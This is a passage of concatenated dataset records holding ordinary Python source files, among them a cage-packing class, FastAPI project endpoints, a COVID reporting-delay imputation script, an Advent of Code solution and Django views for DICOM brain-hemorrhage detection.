the polygon in list form\n self.rubberBand.reset(True)\n return self.points\n\n # self.isEmittingPoint = False\n # r = self.rectangle()\n # if r is not None:\n # self.rect_created.emit(r)\n #QMessageBox.about(self.dlg, \"teste\", str('ola'))\n # print(\"Rectangle:\", r.xMinimum(),\n # r.yMinimum(), r.xMaximum(), r.yMaximum()\n # )\n #\n # def canvasMoveEvent(self, e):\n # if not self.isEmittingPoint:\n # return\n #\n # self.endPoint = self.toMapCoordinates(e.pos())\n #\n # self.showRect(self.startPoint, self.endPoint)\n #\n # def showRect(self, startPoint, endPoint):\n # self.rubberBand.reset()\n # if startPoint.x() == endPoint.x() or startPoint.y() == endPoint.y():\n # return\n #\n # point1 = QgsPointXY(startPoint.x(), startPoint.y())\n # point2 = QgsPointXY(startPoint.x(), endPoint.y())\n # point3 = QgsPointXY(endPoint.x(), endPoint.y())\n # point4 = QgsPointXY(endPoint.x(), startPoint.y())\n # point5 = point1\n #\n # self.rubberBand.addPoint(point1, False)\n # self.rubberBand.addPoint(point2, False)\n # self.rubberBand.addPoint(point3, False)\n # self.rubberBand.addPoint(point4, False)\n # self.rubberBand.addPoint(point5, True)\n # # true to update canvas\n # self.rubberBand.show()\n #\n #\n # def rectangle(self):\n # if self.startPoint is None or self.endPoint is None:\n # return None\n # elif (self.startPoint.x() == self.endPoint.x() or \\\n # self.startPoint.y() == self.endPoint.y()):\n # return None\n #\n # return QgsRectangle(self.startPoint, self.endPoint)\n #\n #\n # def deactivate(self):\n # QgsMapTool.deactivate(self)\n # self.deactivated.emit()\n","sub_path":"vigour_maps_dialog.py","file_name":"vigour_maps_dialog.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522921141","text":"from .helper import BoundPoint, build_using_optimal_stacking_bounds, build_stacks, get_products_total_volume\n\n\nclass CageException(Exception):\n pass\n\n\nclass Cage:\n Height = 1603\n Width = 697 # Only for reference, not related to orientation\n Length = 846 # Only for reference, not related to orientation\n\n TotalVolume = (Height * Length * Width)\n\n def __init__(self):\n \"\"\"\n Initialise Cage\n \"\"\"\n\n self.orientated_base = None # Set this when the optimal base orientation is found\n self.zones_filled = 0 # Zones that are filled\n self.stacks = []\n self.used_volume = 0\n\n self.used_items = []\n self.remaining_items = []\n\n def _fill_zones(self, product_items: list, free_bounds: list):\n\n # Get optimal orientation\n optimal_info = build_using_optimal_stacking_bounds(product_items, free_bounds)\n\n if not self.orientated_base:\n self.orientated_base = optimal_info[\"bound_point\"] # Set the Cage Orientation (x,y,z)\n\n self.remaining_items = optimal_info[\"remaining_items\"]\n stacked_items = optimal_info[\"stacked_items\"]\n\n self.zones_filled += 1\n stack_zone_info = {\"stack_zone\": self.zones_filled, \"stacked_items\": stacked_items}\n self.stacks.append(stack_zone_info)\n for stack in stacked_items:\n self.used_volume += get_products_total_volume(stack)\n\n def stack_products(self, product_items: list):\n \"\"\"\n Method to stack products\n :param product_items:\n :return:\n \"\"\"\n stacked_items = []\n if self.zones_filled == 0:\n bounds = (BoundPoint(Cage.Width, Cage.Length, Cage.Height),\n BoundPoint(Cage.Length, Cage.Width, Cage.Height),)\n\n self._fill_zones(product_items, bounds)\n\n if len(self.remaining_items) > 0:\n free_bounds = self._get_free_bounding_points(1)\n 
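# zone 0 left part of the base uncovered, so the leftover items are packed into zone 1\n            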
self._fill_zones(self.remaining_items, free_bounds)\n\n def _get_free_bounding_points(self, zone_no):\n \"\"\"\n This method will return the list of free bounds of the base\n :param zone_no:\n :return: the list of free bounds of the base\n \"\"\"\n if zone_no > 1:\n raise ValueError(\"Zones greater than one are not implemented!\")\n\n zone_one_base_bound_pts = []\n for stack in self.stacks:\n if stack[\"stack_zone\"] == zone_no:\n item_stacks = [stacked_item for stacked_item in stack[\"stacked_items\"]]\n for _stack in item_stacks:\n first_boundpt = next(x['3d_point'] for x in _stack)\n zone_one_base_bound_pts.append(first_boundpt)\n\n free_base_bounds = []\n for i in range(len(zone_one_base_bound_pts)): # Loop through the base bound points\n new_x = self.orientated_base.x - zone_one_base_bound_pts[i].x\n if i == 0:\n new_y = self.orientated_base.y\n else:\n new_y -= zone_one_base_bound_pts[i - 0].y\n free_base_bounds.append(BoundPoint(new_x, new_y, self.orientated_base.z))\n\n return free_base_bounds\n\n @property\n def CageSpaceUtilisation(self):\n if len(self.remaining_items)==0:\n return 100.00 # Cannot use space if no more products left. :)\n else:\n return round((self.used_volume/Cage.TotalVolume)*100,2)","sub_path":"sample/products/caging.py","file_name":"caging.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"447568252","text":"\"\"\"This module provides view functions for projects endpoints.\"\"\"\n\n# pylint: disable=wrong-import-order\n# pylint: disable=ungrouped-imports\n\nfrom fastapi import APIRouter, Form\nfrom http import HTTPStatus\nimport requests\nfrom starlette.responses import JSONResponse\nfrom starlette.requests import Request\nfrom typing import Text\n\nfrom common.utils import error_response\nfrom projects.src.project_management import ProjectManager\nfrom projects.src.utils import log_request\n\nrouter = APIRouter() # pylint: disable=invalid-name\n\n\n@router.get('/projects', tags=['projects'])\ndef list_projects(request: Request) -> JSONResponse:\n \"\"\"Get projects list.\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n projects = project_manager.list_projects()\n return JSONResponse(projects)\n\n\n@router.post('/projects', tags=['projects'])\ndef create_project(request: Request, name: Text = Form(...),\n description: Text = Form('')) -> JSONResponse:\n \"\"\"Create project.\n Args:\n name {Text}: project name\n description {Text}: project description\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'name': name,\n 'description': description\n })\n\n project_manager = ProjectManager()\n project_id = project_manager.create_project(name, description)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.CREATED)\n\n\n@router.get('/projects/{project_id}', tags=['projects'])\ndef get_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Get project.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n project = project_manager.get_project(project_id)\n return JSONResponse(project)\n\n\n@router.put('/projects/{project_id}', tags=['projects'])\ndef update_project(request: Request, project_id: int, name: Text = Form(None),\n description: Text = Form(None)) 
-> JSONResponse:\n \"\"\"Update project.\n Args:\n project_id {int}: project id\n name {Text}: project name\n description {Text}: project description\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id,\n 'name': name,\n 'description': description\n })\n\n project_manager = ProjectManager()\n if name is not None:\n project_manager.update_project_name(project_id, name)\n\n if description is not None:\n project_manager.update_project_description(project_id, description)\n\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project)\n\n\n@router.delete('/projects/{project_id}', tags=['projects'])\ndef delete_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Delete project.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n project = project_manager.get_project(project_id)\n project_manager.terminate(project_id)\n project_manager.delete_project(project_id)\n\n return JSONResponse(project, status_code=HTTPStatus.OK)\n\n\n@router.get('/projects/{project_id}/healthcheck', tags=['projects'])\ndef project_healthcheck(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Get project healthcheck (check if project's tracking server process was started).\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n project = project_manager.get_project(project_id)\n is_running = project_manager._is_running(project_id)\n\n if is_running:\n return JSONResponse(project, HTTPStatus.OK)\n else:\n return JSONResponse(project, HTTPStatus.BAD_REQUEST)\n\n\n@router.put('/projects/{project_id}/run', tags=['projects'])\ndef run_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Run project's tracking server.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n running = project_manager.run(project_id)\n\n if not running:\n return error_response(\n http_response_code=HTTPStatus.INTERNAL_SERVER_ERROR,\n message='Internal error, tracking server has terminated'\n )\n\n project = project_manager.get_project(project_id)\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.put('/projects/{project_id}/terminate', tags=['projects'])\ndef terminate_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Terminate project's tracking server.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n project_manager.terminate(project_id)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.put('/projects/{project_id}/archive', tags=['projects'])\ndef archive(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Archive project.\n Args:\n id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n 
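# stop the project's tracking server before archiving so an archived project is never left running\n    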
project_manager = ProjectManager()\n project_manager.terminate(project_id)\n project_manager.archive(project_id)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.put('/projects/{project_id}/restore', tags=['projects'])\ndef restore(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Restore project.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n project_manager.restore(project_id)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.get('/projects/{project_id}/ping', tags=['projects'])\ndef ping(request: Request, project_id: int) -> JSONResponse:\n \"\"\"Ping project's tracking server.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n url = project_manager.get_internal_tracking_uri(project_id)\n project = project_manager.get_project(project_id)\n\n try:\n requests.get(url)\n return JSONResponse(project, HTTPStatus.OK)\n except requests.exceptions.ConnectionError:\n return JSONResponse(project, HTTPStatus.BAD_REQUEST)\n","sub_path":"services/projects/src/routers/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"437643484","text":"import os\nimport re\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom text_admin.models import Snippet\n\n\n\nIS_ADDENDUM = r'\\{\\% load addendum_tags \\%\\}'\nSNIPPET_PATTERNS= (\n re.compile(r\"\"\"\\{\\% snippet \\'(?P\\w*:\\w*)\\' \\%\\}(?P.*)\\{\\% endsnippet \\%\\}\"\"\", re.UNICODE),\n re.compile(r\"\"\"\\{\\%snippet \\'(?P\\w*:\\w*)\\' \\%\\}(?P.*)\\{\\% endsnippet\\%\\}\"\"\", re.UNICODE),\n re.compile(r\"\"\"\\{\\% snippet (?P\\w*) \\%\\}(?P.*)\\{\\% endsnippet \\%\\}\"\"\", re.UNICODE),\n re.compile(r\"\"\"\\{\\%snippet (?P\\w*) \\%\\}(?P.*)\\{\\% endsnippet\\%\\}\"\"\", re.UNICODE),\n )\n\n\nclass Command(BaseCommand):\n help = 'Creates snippet instances from templates'\n\n def set_files(self):\n file_list = []\n for dr in settings.TEMPLATE_DIRS:\n for root, subFolders, files in os.walk(dr):\n for file in files:\n file_list.append(os.path.join(root,file))\n self.files = file_list\n\n\n def search_files(self):\n for template in self.files:\n with open(template, 'r') as template:\n data = template.read()\n\n is_addendum = re.search(IS_ADDENDUM, data) # check if the template loads addendum\n if is_addendum:\n for pattern in SNIPPET_PATTERNS:\n snips = [m.groupdict() for m in pattern.finditer(data)]\n if snips:\n self.founds += snips \n\n def handle_results(self):\n for snip in self.founds:\n snip, c = Snippet.objects.get_or_create(\n key = snip['name'],\n defaults={'text':snip['content']}\n )\n\n\n\n def handle(self, *args, **options):\n self.founds = [] # list for storing re.matches\n \n self.set_files()\n self.search_files()\n\n self.handle_results()\n\n\n\n","sub_path":"text_admin/management/commands/makesnippets.py","file_name":"makesnippets.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"428919196","text":"import 
astroid\nimport pylint.testutils\nimport pytest\n\nimport pylint_protobuf\nfrom conftest import make_message\n\n\ndef test_inline_proto_compilation(proto_builder):\n mod_name = proto_builder(\"\"\"\n message Foo {\n required int32 id = 1;\n }\n \"\"\")\n node = astroid.extract_node(\"\"\"\n import {} as mod\n foo = mod.Person()\n foo.missing = 123\n \"\"\".format(mod_name))\n assert node is not None\n\n\n@pytest.fixture\ndef foo_mod(proto_builder):\n return proto_builder(\"\"\"\n message Foo {\n required int32 id = 1;\n }\n \"\"\", 'foo')\n\n\nclass TestAutoBuilder(pylint.testutils.CheckerTestCase):\n CHECKER_CLASS = pylint_protobuf.ProtobufDescriptorChecker\n\n def test_missing_field(self, foo_mod):\n node = astroid.extract_node(\"\"\"\n import {} as mod\n foo = mod.Foo()\n foo.should_warn\n \"\"\".format(foo_mod))\n message = make_message(node, 'Foo', 'should_warn')\n with self.assertAddsMessages(message):\n self.walk(node.root())\n","sub_path":"tests/test_proto_builder.py","file_name":"test_proto_builder.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215099687","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Imputation Script for Production\n\n# ## Imports\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n# Import own code from other directory\nimport sys\n\nsys.path.append(\"../../code/imputation\")\n\nfrom imputation_methods import impute_pmm\n\n\n# ## Logging\n\nimport logging\n\nlogger = logging.getLogger(name=\"IMPUTATION\")\nlogging.basicConfig()\nlogger.setLevel(logging.INFO)\n\n\n# ## Data Loading and Preparation\n\nlogger.info(\"Loading data.\")\n\n\nfilename = \"delay_2020-05-06\"\n\n\ndelay = pd.read_pickle(f\"../../data/processed/{filename}.pl\")\nif \"id\" in delay.columns:\n delay = delay.drop(\"id\", axis=1)\n\n\n# #### Summarize all observations which do not have known or binary gender\n\ndelay.loc[\n (delay[\"gender\"] != \"male\") & (delay[\"gender\"] != \"female\"), \"gender\"\n] = \"other\"\n\n\n# #### Remove observations with negative reporting delay\n\ndelay_neg = delay[delay[\"reporting_delay_hd\"] < 0]\ndelay = delay[\n (delay[\"reporting_delay_hd\"] >= 0) | (delay[\"reporting_delay_hd\"].isnull())\n]\n\n\n# #### One-Hot Encoding (Dummy Variables)\n\nlogger.info(\"Encoding as One-Hot variables.\")\n\n\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef to_dummy(X):\n enc = OneHotEncoder(handle_unknown=\"error\", sparse=False, drop=\"first\")\n X_cat = X.select_dtypes(include=[object, \"category\"])\n X_num = X.select_dtypes(exclude=[object, \"category\"])\n X_trans = pd.DataFrame(\n enc.fit_transform(X_cat),\n columns=enc.get_feature_names(X_cat.columns),\n index=X.index,\n )\n X_dummy = pd.concat([X_num, X_trans], axis=1)\n return X_dummy, enc, X_cat.columns\n\n\ndef from_dummy(X, enc, cat_columns):\n X_trans = X[enc.get_feature_names(cat_columns)]\n X_num = X.drop(enc.get_feature_names(cat_columns), axis=1)\n X_cat = pd.DataFrame(\n enc.inverse_transform(X_trans), columns=cat_columns, index=X.index\n )\n X_res = pd.concat([X_num, X_cat], axis=1)\n return X_res\n\n\ndef to_coded(X):\n X = X.copy()\n X_cat = X.select_dtypes(include=[object, \"category\"])\n\n # define\n def map_to_int(series):\n \"\"\"Convert non-numeric features to integer codes\"\"\"\n series_cat = series.astype(\"category\")\n mapping = dict(zip(series_cat, series_cat.cat.codes))\n return series_cat.cat.codes, mapping\n\n mappings 
= {feat: map_to_int(X[feat])[1] for feat in X_cat.columns}\n\n # apply\n for feat, mapping in mappings.items():\n X[feat] = X[feat].replace(mapping)\n\n return X, mappings\n\n\ndelay_labels = [\n \"reporting_delay_hd\",\n \"week_report\",\n \"weekday_report\",\n \"age\",\n \"gender\",\n \"state\",\n]\ndelay_dummy, enc, enc_cats = to_dummy(delay[delay_labels])\n\n\n# ## Perform Imputation\n\nlogger.info(\"Performing imputation.\")\n\n\n# impute delay\ndelay_imputed = impute_pmm(\n delay_dummy,\n \"reporting_delay_hd\",\n regressor=RandomForestRegressor(n_estimators=10),\n k_pmm=5,\n n=3,\n)\n# round to next integer\ndelay_imputed = delay_imputed.round()\n# compute day of onset by subtracting delay from day of report\nonset_imputed = delay_imputed.apply(\n lambda x: delay.loc[delay_imputed.index, \"day_report\"] - x\n)\n\n\n# ## Factor imputed values back into original dataframe\n\nlogger.info(\"Reintegrating as delay dataframe.\")\n\n\ndef as_ordered_weekday(col):\n return col.astype(pd.CategoricalDtype(ordered=True)).cat.reorder_categories(\n [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"],\n ordered=True,\n )\n\n\n# Concat columns\ndelay_imp = delay.copy()\nfor col in onset_imputed.columns:\n delay_imp[col] = np.nan\n delay_imp.loc[onset_imputed.index, col] = onset_imputed[col]\n\n# Pivot to long format\ndelay_imp = delay_imp.melt(\n id_vars=delay_imp.drop([\"day_onset\"] + list(onset_imputed.columns), axis=1).columns,\n value_vars=[\"day_onset\"] + list(onset_imputed.columns),\n var_name=\"imputation\",\n value_name=\"day_onset\",\n)\n\n# Drop empty day onset rows\ndelay_imp = delay_imp.dropna(subset=[\"day_onset\"]).sort_values(\"day_onset\")\n\n# Compute derived values for imputed rows\ndelay_imp[\"imputation\"] = delay_imp[\"imputation\"].replace({\"day_onset\": \"original\"})\ndelay_imp[\"imputed\"] = delay_imp[\"imputation\"] != \"original\"\ndelay_imp[\"date_onset\"] = pd.to_datetime(\"2020-01-01\") + pd.to_timedelta(\n delay_imp[\"day_onset\"], unit=\"days\"\n)\ndelay_imp[\"week_onset\"] = delay_imp[\"date_onset\"].dt.week\ndelay_imp[\"weekday_onset\"] = as_ordered_weekday(delay_imp[\"date_onset\"].dt.day_name())\ndelay_imp[\"reporting_delay_hd\"] = delay_imp[\"day_report\"] - delay_imp[\"day_onset\"]\ndelay_imp[\"reporting_delay_rki\"] = delay_imp[\"day_report_rki\"] - delay_imp[\"day_onset\"]\n\n\n# ### Add observations with negative reporting delay\n\ndelay_final = pd.concat(\n [delay_imp, delay_neg.assign(imputation=\"original\", imputed=False)], sort=False\n)\n\n\n# ## Export imputed dataset\n\n# As CSV\n\nlogger.info(\"Exporting as CSV.\")\n\n\nfor imp in delay_final[\"imputation\"].unique():\n if imp != \"original\":\n delay_final.query(f\"imputation=='original' | imputation=='{imp}'\").to_csv(\n f\"../../data/processed/{filename}_{imp}.csv\", index=False\n )\n\n\n# As pickle file\n\nlogger.info(\"Exporting as pickle.\")\n\n\nfor imp in delay_final[\"imputation\"].unique():\n if imp != \"original\":\n delay_final.query(f\"imputation=='original' | imputation=='{imp}'\").to_pickle(\n f\"../../data/processed/{filename}_{imp}.pl\"\n )\n","sub_path":"code/imputation/impute.py","file_name":"impute.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"258890798","text":"import argparse \nimport Video\n\ndef MotionMeerkat(path,keep=True,vidpath=\"\",write=False):\n\n #create instance\n 
video_instance=Video.Video(path,vidpath=vidpath,keep=keep,write=write)\n\n    #send to google for labels\n    video_instance.label() \n    \n    #download file to play locally\n    video_instance.download()\n    \n    #show video with annotations\n    video_instance.show()\n    \n    #cleanup video staging file\n    video_instance.cleanup()\n    \n#run if called directly from command line\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-gcs_uri', help='The Google Cloud Storage URI of the video.')\n    parser.add_argument('-vidpath', default='', help='The local file directory to save annotated video') \n    parser.add_argument('-keep', help='Should the downloaded file be kept after analysis?',action=\"store_true\") \n    parser.add_argument('-write', help='Should an annotated video file be written',action=\"store_true\") \n    parser.add_argument('-show', help='Show annotations within program video',action=\"store_true\") \n    \n    args = parser.parse_args() \n    MotionMeerkat(args.gcs_uri, keep=args.keep, vidpath=args.vidpath, write=args.write)\n","sub_path":"MotionMeerkat/MotionMeerkat.py","file_name":"MotionMeerkat.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"632688833","text":"# Manipulate the yaml configuration file for running tests.\n\nimport subprocess\nimport yaml\nimport numpy as np\nfrom itertools import product\n\n\n# Take a yaml filename and a dictionary, and use the key-value pairs to\n# update the fields and values in the file.\ndef update(filename, changesdict):\n    with open(filename) as f:\n        current_dict = yaml.safe_load(f)\n    for key in changesdict:\n        current_dict[key] = changesdict[key]\n    with open(filename, 'w') as f:\n        yaml.dump(current_dict, f)\n    \n\n# Take a yaml filename and return a tuple of the keys and a tuple of\n# the values.\ndef get_tuples(filename):\n    with open(filename) as f:\n        d = yaml.safe_load(f)\n    keys = tuple(d.keys())\n    vals = tuple(d.values())\n    return keys, vals\n    \n\n# First read in the metaconfig file with all the different hyperparameters\n# to be tested. 
Then change the config file, run train.py, and repeat.\nif __name__ == '__main__':\n keys, vals = get_tuples('metaconfig.yml')\n\n combos = list(product(*vals))\n \n for elem in combos:\n mydict = dict(zip(keys, elem))\n update('maopac_config.yml', mydict)\n subprocess.call(['python', 'maopac_test.py'])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# end\n","sub_path":"multiagent/scripts/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521898871","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\nfrom enum import Enum, EnumMeta\r\n\r\n# Create your models here.\r\n\r\nclass deliveries(models.Model):\r\n GUSH_DAN = 'GD'\r\n RAMAT_HAGOLAN = 'RH'\r\n HASHFELA = 'HS'\r\n DAROM = 'DR'\r\n GALIL = 'GL'\r\n AREA_CHOISES = [\r\n (GUSH_DAN, 'Gush Dan'),\r\n (RAMAT_HAGOLAN, 'Ramat Hagolan'),\r\n (HASHFELA, 'Hashfela'),\r\n (DAROM, 'Darom'),\r\n (GALIL, 'Galil'),\r\n ]\r\n area = models.CharField(\r\n max_length=2,\r\n choices=AREA_CHOISES,\r\n default=GUSH_DAN,\r\n )\r\n\r\n MAIL='MA'\r\n FOOD= 'FO'\r\n FLOWERS='FL'\r\n GIFT='GF'\r\n MYSTERYBOX='MB'\r\n TYPE_CHOICES = [\r\n (MAIL,'Mail'),\r\n (FOOD,'Food'),\r\n (FLOWERS,'Flowers'),\r\n (GIFT,'Gift'),\r\n (MYSTERYBOX,'Mystery Box')\r\n ]\r\n delType = models.CharField(\r\n max_length=11,\r\n choices=TYPE_CHOICES,\r\n default=MAIL\r\n )\r\n class Status(models.IntegerChoices):\r\n i_will_take_it=0\r\n im_on_my_way = 1\r\n delivery_has_arrieved = 2\r\n finish_delivery=3\r\n status = models.IntegerField(choices=Status.choices, default=0)\r\n class Size(models.IntegerChoices):\r\n S=0\r\n M = 1\r\n L = 2\r\n size = models.IntegerField(choices=Size.choices, default=0)\r\n sender = models.ForeignKey(User,on_delete=models.CASCADE)\r\n deliveryman = models.ForeignKey( User,blank=True, null=True,on_delete=models.SET_NULL,related_name='+')\r\n description = models.CharField(max_length=256,blank=True,null=True)\r\n title = models.CharField(max_length=80)\r\n\r\n","sub_path":"final_project-proj/deliveries/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493747383","text":"import re\nwith open(\"input14.txt\") as f:\n\tinp = f.read().splitlines()\n\n\ndef parseInp(inp):\n\tdata = []\n\tfor line in inp: #mask = 11110100010101111011001X0100XX00100X mem[44304] = 31572 \n\t\tinst, value = re.split(\" = \",line)\n\t\tif inst == \"mask\":\n\t\t\tdata.append((\"mask\",value))\n\t\telse:\n\t\t\tmem = re.match(r\"mem\\[(\\d*)\\]\",inst)\n\t\t\tdata.append((int(mem.group(1)),int(value)))\n\n\treturn data\n\n\ndef value_after_bitmask(bitmask,default):\n\treturn int(\"\".join([bit if bit != \"X\" else str(default) for bit in bitmask]),2)\n\ndef decimal_to_binary(decimal):\n\treturn bin(decimal).replace(\"b\",\"\")\n\ndef real_bitmask_and_adress(bitmask,adress):\n\tbitmask = bitmask[::-1]\n\tadress = adress[:0:-1]\n\tfor index in range(len(bitmask)):\n\t\tif index == len(adress):\n\t\t\treturn bitmask[::-1]\n\t\telse:\n\t\t\tif adress[index] == \"1\" and bitmask[index] != \"X\":\n\t\t\t\tbitmask = bitmask[:index] + \"1\" + bitmask[index+1:]\n\t\t\t\t#bitmask[index] = \"1\"\n\treturn bitmask[::-1]\n\ndef get_all_adresses(adress, index = 0):\n\tlist_of_adresses = []\n\tif adress.isnumeric():\n\t\treturn [adress]\n\twhile index < len(adress):\n\t\tif adress[index] == \"X\":\n\t\t\tadress_0 = 
adress[: index] + \"0\" + adress[index+1:]\t\t\n\t\t\tlist_of_adresses += get_all_adresses(adress_0,index)\n\t\t\tadress_1 = adress[: index] + \"1\" + adress[index+1:]\t\t\n\t\t\tlist_of_adresses += get_all_adresses(adress_1,index)\n\t\tindex +=1\n\treturn list_of_adresses\n\n\ndef star1(inp):\n\tmemory = dict()\n\tfor inst in inp:\n\t\tif inst[0] == \"mask\":\n\t\t\tbitmask = inst[1]\n\t\telse:\n\t\t\tAND = value_after_bitmask(bitmask,1)\n\t\t\tOR = value_after_bitmask(bitmask,0)\n\t\t\tmemory[inst[0]] = inst[1] & AND | OR\n\treturn sum(memory.values())\n\n\ndef star2(inp):\n\tmemory = dict()\n\tfor inst in inp:\n\t\tif inst[0] == \"mask\":\n\t\t\tbitmask = inst[1]\t\n\t\telse:\n\t\t\treal_adress = real_bitmask_and_adress(bitmask,decimal_to_binary(inst[0]))\n\t\t\tall_adresses = get_all_adresses(real_adress)\n\t\t\tfor adress in all_adresses:\n\t\t\t\tmemory[adress] = inst[1]\n\treturn sum(memory.values())\n\n\n\n\nprint(f\"Day 14 star1 : {star1(parseInp(inp))}\")\nprint(\"Day 14 star2 : {}\".format(star2(parseInp(inp))))\n\n","sub_path":"adventcode/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"342926737","text":"import os, sys, cv2, uuid, json, glob, numpy as np, tensorflow as tf, pydicom\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.views.decorators.csrf import csrf_exempt\nfrom pydicom.data import get_testdata_files\nfrom datetime import datetime\nfrom modules.utils import label_map_util\nfrom modules.utils import visualization_utils as vis_util\nfrom datetime import datetime\nfrom home.model.Dicom2Png import Dicom2Png\nfrom home.model.DicomInfo import DicomInfo\nfrom home.model.DBConnect import DBConnect\nfrom home.model.DetectionBrainHemorrhage import DetectionBrainHemorrhage\nfrom home.model.ClusterVectors import ClusterVectors\nfrom annoy import AnnoyIndex\nfrom scipy import spatial\nfrom nltk import ngrams\n\ndetection = DetectionBrainHemorrhage()\n\ndef getViewTrangChu(request):\n return render(request, 'view-trang-chu-v2.html')\n\n@csrf_exempt\ndef postUpload(request):\n if request.method == 'POST':\n randomTenFile = str(uuid.uuid1())\n fileUpload = request.FILES.get('file')\n fs = FileSystemStorage()\n\n fileName = fs.save(randomTenFile, fileUpload)\n urlFile = fs.url(fileName)\n\n dicom = Dicom2Png()\n dicom.Convert(urlFile, randomTenFile)\n \n db = DBConnect()\n IDDICOM = str(uuid.uuid1())\n THOIGIAN = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n db.noneGetTable(\"INSERT INTO DICOM(IDDICOM, TENFILE, THOIGIAN) VALUES ('{0}', '{1}', '{2}')\".format(\n IDDICOM, randomTenFile, THOIGIAN\n ))\n\n return HttpResponse(randomTenFile)\n else:\n return HttpResponse(\"FILE NOT FOUND\")\n\n@csrf_exempt\ndef docThongTinFileDicom(request):\n if request.method == 'POST':\n dicom = DicomInfo()\n path = \"static/uploads/dicom/\" + request.POST.get(\"tenFile\")\n return HttpResponse(dicom.getInfoJson(path))\n else:\n return HttpResponse(\"FILE NOT FOUND\")\n\n@csrf_exempt\ndef nhanDangVungXuatHuyet(request):\n if request.method == 'POST':\n tenFile = request.POST.get(\"tenFile\")\n arrayPath = detection.Detection(\"static/uploads/images/{0}.png\".format(tenFile))\n\n # Lưu kết quả vào DB\n db = DBConnect()\n IDDICOM = db.getTable(\"SELECT IDDICOM FROM DICOM WHERE TENFILE = '{0}'\".format(tenFile))\n for item in arrayPath or []:\n 
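# NOTE: interpolating values straight into SQL like this is injection-prone; parameterised queries would be safer\n            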
